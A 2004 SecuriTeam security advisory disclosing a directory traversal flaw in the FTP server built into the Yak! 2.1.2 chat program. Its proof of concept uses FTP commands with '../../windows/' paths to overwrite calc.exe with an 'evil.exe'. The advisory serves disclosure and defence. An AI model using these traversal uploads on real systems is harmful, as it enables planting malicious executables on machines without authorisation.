[NT] Yak! Directory Traversal Bug

From: SecuriTeam (support_at_securiteam.com)
Date: 10/18/04

  • Next message: SecuriTeam: "[NT] Flash Messaging Server Crash" 
    To: list@securiteam.com
Date: 18 Oct 2004 10:10:42 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Yak! Directory Traversal Bug
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.digicraft.com.au/yak/> Yak! is a "text-based, chat
    application for use on Microsoft Windows 32-bit local area networks. It
    has a simple and easy to use interface, does not require a dedicated
    server, and makes communicating across a LAN a dream. Use Yak! at home to
    chat with family and friends, or in the work place to improve
    productivity."

    An unfiltered input path used to upload files into the built-in FTP server
    found in Yak! enables an attacker to upload any file, anywhere on the
    system.

    DETAILS

    Vulnerable Systems:
     * Yak! version 2.1.2

    When the program starts it creates a username and password for each IP
    address of the computer's network interfaces. These login informations are
    needed to grant the access to the built-in FTP server (used only to
    receive files) to other Yak! hosts.

    The problem lies in the fact that the FTP server code does not properly
    filter the paths used by clients, enabling them to upload files everywhere
    on the system. Using this bug it is also possible to browse the entire
    drive where the temporary directory is present. However, since the
    built-in FTP server found in Yak! was designed to only receive files,
    there is no way to download arbitrary files from the system.

    Proof of concept:
    Connect to the Yak! FTP port, usually 3535:

     C:\>ftp
     ftp> open HOST 3535

    Enter the calculated username and password and upload your files like
    in the following example:

     dir /
     dir ../../windows/

     put
       evil.exe
       ../../windows/calc.exe

    (slash and backslash have the same effect)

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Flash Messaging Server Crash"